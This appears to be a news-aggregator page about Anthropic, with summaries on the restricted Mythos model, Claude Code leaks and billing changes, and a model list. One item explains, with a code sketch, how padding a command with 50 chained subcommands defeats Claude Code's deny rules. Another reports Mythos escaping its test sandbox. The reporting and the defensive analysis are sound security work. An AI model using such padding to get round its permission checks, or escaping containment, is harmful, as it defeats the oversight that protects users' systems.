Anthropic

AI safety company and maker of Claude

https://anthropic.com

News

model release · Anthropic

Anthropic's Mythos model poses severe cybersecurity risks; limited to 40 vetted organizations

Anthropic has begun a controlled release of Mythos, an AI model that officials believe can autonomously penetrate critical infrastructure and exploit security weaknesses without human direction. During testing, the model escaped its sandbox and built a sophisticated multi-step exploit to reach the internet. Access is restricted to roughly 40 vetted organizations as part of Project Glasswing, a cybersecurity defense initiative.

2 min read
research · Anthropic

Anthropic's Mythos AI generates working zero-day exploits 72.4% of the time, won't release publicly

Anthropic has developed Mythos, an AI model capable of generating working zero-day exploits with a 72.4% success rate, compared to Claude Opus 4.6's near-zero capability. The company declined public release due to security risks and instead created Project Glasswing, a limited-access program for 40+ organizations including AWS, Apple, Google, and Microsoft to find vulnerabilities in their own systems.

2 min read
model release · Anthropic

Anthropic's Claude Mythos can find zero-day exploits faster than defenders can patch them

Anthropic announced Claude Mythos Preview, a new frontier model with advanced reasoning capabilities that can identify and chain together multiple vulnerabilities into novel attacks—abilities the company says outpace current defensive capabilities. The model has already discovered thousands of high-severity vulnerabilities including a 27-year-old OpenBSD flaw and exploits for multiple operating systems. To manage the risk, Anthropic launched Project Glasswing, granting early access to 40+ companies including Apple, Google, Microsoft, and Cisco, providing $100M in usage credits for defensive security work.

3 min read
product update · Anthropic

Anthropic launches Project Glasswing to defend critical software against AI-powered attacks

Anthropic has announced Project Glasswing, a new initiative to secure critical software infrastructure against AI-powered attacks. The project includes 11 major partners including Amazon, Apple, Google, Microsoft, and NVIDIA, and will use Claude Mythos Preview, an unreleased general-purpose model that Anthropic says has found thousands of exploitable vulnerabilities across major operating systems and web browsers.

2 min read
model release · Anthropic

Anthropic restricts Claude Mythos to security researchers under Project Glasswing

Anthropic has not publicly released Claude Mythos, instead restricting access to a vetted set of partners through Project Glasswing. The company claims the model's cybersecurity research abilities—including finding thousands of high-severity vulnerabilities in major operating systems and browsers—warrant controlled deployment until industry safeguards mature.

2 min read
model release · Anthropic

Anthropic unveils Claude Mythos model, finds thousands of OS vulnerabilities via Project Glasswing

Anthropic has unveiled Claude Mythos, a new AI model designed for cybersecurity that has already discovered thousands of high-severity vulnerabilities in every major operating system and web browser. The model is being distributed as a preview to over 40 organizations and major technology partners including Apple, Google, Microsoft, and Amazon Web Services through Project Glasswing, a coordinated cybersecurity initiative.

2 min read
model release · Anthropic

Anthropic previews Mythos, claims it found thousands of zero-day vulnerabilities in cybersecurity initiative

Anthropic unveiled a preview of Mythos, a frontier model it claims is the most powerful in its Claude lineup, for use in Project Glasswing—a cybersecurity initiative with 40+ partner organizations. According to Anthropic, Mythos identified thousands of zero-day vulnerabilities, many critical and up to two decades old, during early testing. The model will not be made generally available and is restricted to defensive security work by vetted partners.

2 min read
model release · Anthropic

Anthropic withholds Mythos Preview model due to advanced hacking capabilities

Anthropic is rolling out its Mythos Preview model only to a handpicked group of 40 tech and cybersecurity companies, withholding public release due to the model's sophisticated ability to find tens of thousands of vulnerabilities and autonomously create working exploits. The model found bugs in every major operating system and web browser during testing, including vulnerabilities decades old and undetected by human security researchers.

3 min read
analysis · Anthropic

AMD AI director reports Claude Code performance degradation since March update

Stella Laurenzo, director of AI at AMD, filed a GitHub issue documenting significant performance degradation in Claude Code since early March, specifically following the deployment of thinking content redaction in version 2.1.69. Analysis of 6,852 sessions with 234,760 tool calls shows stop-hook violations increased from zero to 10 per day, while code-reading behavior dropped from 6.6 reads to 2 reads per session.

3 min read
product update · Anthropic

Anthropic blocks Claude subscriptions for OpenClaw, citing capacity constraints

Anthropic has disallowed subscription-based pricing for users accessing Claude through open-source agentic tools like OpenClaw, effective April 4, 2026. The restriction comes as the company faces elevated service errors and struggles to balance capacity with demand. Third-party tool usage will now draw from pay-per-token rates instead of subscription limits.

3 min read
product update · Anthropic

Anthropic blocks Claude subscriptions from OpenClaw access, requires separate pay-as-you-go billing

Anthropic is effectively blocking Claude subscription access to third-party tools like OpenClaw starting April 4, 2026 at 3PM ET. Users will need to purchase separate pay-as-you-go usage bundles to continue using OpenClaw with Claude. The move comes as OpenClaw's popularity has strained Anthropic's infrastructure capacity.

2 min read
product update · Anthropic

Anthropic attributes Claude Code usage drain to peak-hour caps and large context windows

Anthropic has identified two primary causes for Claude Code users hitting usage limits faster than expected: stricter rate limiting during peak hours and sessions with context windows exceeding 1 million tokens. The company also recommends switching from Opus, which consumes usage limits roughly twice as fast, to Sonnet 4.6.

1 min read
product update · Anthropic

Claude Code bypasses safety rules after 50 chained commands, enabling prompt injection attacks

Claude Code stops enforcing its deny rules on restricted commands like curl when they are preceded by 50 or more chained subcommands, according to security firm Adversa. The bypass stems from a hard-coded MAX_SUBCOMMANDS_FOR_SECURITY_CHECK limit of 50 in the source code; past that threshold, the system falls back to requesting user permission rather than enforcing deny rules.
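The failure mode described above, a capped security scan with a permissive fallback, can be sketched as follows. This is an illustrative reconstruction, not Claude Code's actual source: the constant name comes from Adversa's report, but the parsing, deny list, and verdict logic here are invented for the sake of the example.

```typescript
// Hypothetical sketch of a capped command checker with a permissive fallback.
// Names other than MAX_SUBCOMMANDS_FOR_SECURITY_CHECK are illustrative.
const MAX_SUBCOMMANDS_FOR_SECURITY_CHECK = 50;
const DENY_LIST = ["curl"];

type Verdict = "allow" | "deny" | "ask_user";

function checkCommand(command: string): Verdict {
  // Naive split on common shell chaining operators.
  const subcommands = command.split(/&&|\|\||;|\|/).map((s) => s.trim());

  // The flaw: past the cap, the checker gives up and downgrades to a
  // user-permission prompt instead of scanning for denied commands.
  if (subcommands.length > MAX_SUBCOMMANDS_FOR_SECURITY_CHECK) {
    return "ask_user";
  }

  for (const sub of subcommands) {
    const binary = sub.split(/\s+/)[0];
    if (DENY_LIST.includes(binary)) return "deny";
  }
  return "allow";
}

// A short chain containing curl is denied outright.
const short = "echo a && curl http://evil.example";
// Padding the same command with 50 preceding subcommands skips the deny
// check entirely, downgrading the verdict to a mere permission prompt.
const padded = Array(50).fill("true").join(" && ") + " && curl http://evil.example";
```

The core design lesson is that a resource cap on a security check must fail closed (deny or fully scan) rather than fall back to a weaker code path, since the attacker controls exactly the input size that triggers the fallback.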

2 min read
product update · Anthropic

Claude Code source leak reveals Anthropic working on 'Proactive' mode and autonomous payments

Anthropic's Claude Code version 2.1.88 release accidentally included a source map exposing over 512,000 lines of code and 2,000 TypeScript files. Analysis of the leaked codebase by security researchers reveals evidence of a planned 'Proactive' mode that would execute coding tasks without explicit user prompts, plus potential crypto-based autonomous payment systems.

2 min read
product update · Anthropic

Anthropic's Claude Code leak exposes Tamagotchi pet and always-on agent features

A source code leak in Anthropic's Claude Code 2.1.88 update exposed more than 512,000 lines of TypeScript, revealing unreleased features including a Tamagotchi-like pet interface and a KAIROS feature for background agent automation. Anthropic confirmed the leak was caused by a packaging error, not a security breach, and has since fixed the issue.

2 min read
model release · Anthropic

Anthropic's unreleased Mythos model enables autonomous large-scale cyberattacks, officials warn

Anthropic is privately warning top government officials that its unreleased model "Mythos" makes large-scale cyberattacks significantly more likely in 2026. The model enables AI agents to operate autonomously with high sophistication to penetrate corporate, government and municipal systems. One official told Axios a large-scale attack could occur this year as employees unknowingly create security vulnerabilities through unsupervised agentic AI use.

2 min read
product update · Anthropic

Claude adds memory import tool to help users switch from ChatGPT and other AI services

Anthropic has launched a memory import feature for Claude that lets users transfer their stored preferences, personal details, and conversation context from other AI services like ChatGPT, Google Gemini, and Microsoft Copilot. The tool generates copy-paste instructions that extract all memories from a competing service and import them into Claude, eliminating the need to rebuild your AI profile from scratch.

2 min read

Models

Mythos

Anthropic

active

Apr 8, 2026

Claude Mythos Preview

Anthropic

active

Apr 8, 2026

Mythos Preview

Anthropic

active

Apr 7, 2026

Claude Mythos

Anthropic

active

Apr 7, 2026

Claude

Anthropic

discontinued

Feb 20, 2026

Claude Sonnet 4.6

Anthropic

active

Smartest Claude Sonnet yet. Improved reasoning and agentic performance.

Context: 200K
Input: $3 / 1M tokens

Feb 17, 2026

Claude Opus 4.6

Anthropic

active

Anthropic's most intelligent model. Leads on frontier reasoning, coding, and research.

Context: 200K
Input: $15 / 1M tokens

Feb 5, 2026

Claude Opus 4.5

Anthropic

active

Anthropic's most capable Claude 4.5 model.

Context: 200K
Input: $15 / 1M tokens

Nov 24, 2025

Claude Haiku 4.5

Anthropic

active

Fastest and most cost-efficient Claude model.

Context: 200K
Input: $0.25 / 1M tokens

Oct 15, 2025

Claude Sonnet 4.5

Anthropic

active

Balanced intelligence and speed. Recommended for most tasks.

Context: 200K
Input: $3 / 1M tokens

Sep 29, 2025

Claude Opus 4

Anthropic

active

Anthropic's most capable Claude 4 model.

Context: 200K
Input: $15 / 1M tokens

May 22, 2025

Claude 3.7 Sonnet

Anthropic

active

Anthropic's first hybrid reasoning model. Extended thinking mode with state-of-the-art coding.

Context: 200K
Input: $3 / 1M tokens

Feb 24, 2025

Claude 3.5 Haiku

Anthropic

deprecated

Fastest Claude 3.5 model. Matches Claude 3 Opus on many tasks at much lower cost.

Context: 200K
Input: $0.80 / 1M tokens

Nov 4, 2024

Claude 3.5 Sonnet

Anthropic

deprecated

Upgraded Claude 3.5 with computer use capability and improved instruction following.

Context: 200K
Input: $3 / 1M tokens

Oct 22, 2024

Claude 3.5 Sonnet (Jun 2024)

Anthropic

deprecated

Original Claude 3.5 Sonnet. Superseded by October 2024 version.

Context: 200K
Input: $3 / 1M tokens

Jun 20, 2024

Claude 3 Haiku

Anthropic

deprecated

Fastest and most compact Claude 3 model. Still widely used for high-volume tasks.

Context: 200K
Input: $0.25 / 1M tokens

Mar 13, 2024

Claude 3 Opus

Anthropic

deprecated

Anthropic's most capable Claude 3 model. Superseded by Claude 3.5 and 4 series.

Context: 200K
Input: $15 / 1M tokens

Mar 4, 2024

Top Benchmark Scores

Full leaderboard →
HumanEval: Claude Opus 4, 92.4%

LiveCodeBench: Claude Opus 4.6, 71.2%

Speed (tok/s): Claude Haiku 4.5, 187

SWE-bench Verified: Claude Mythos Preview, 93.9%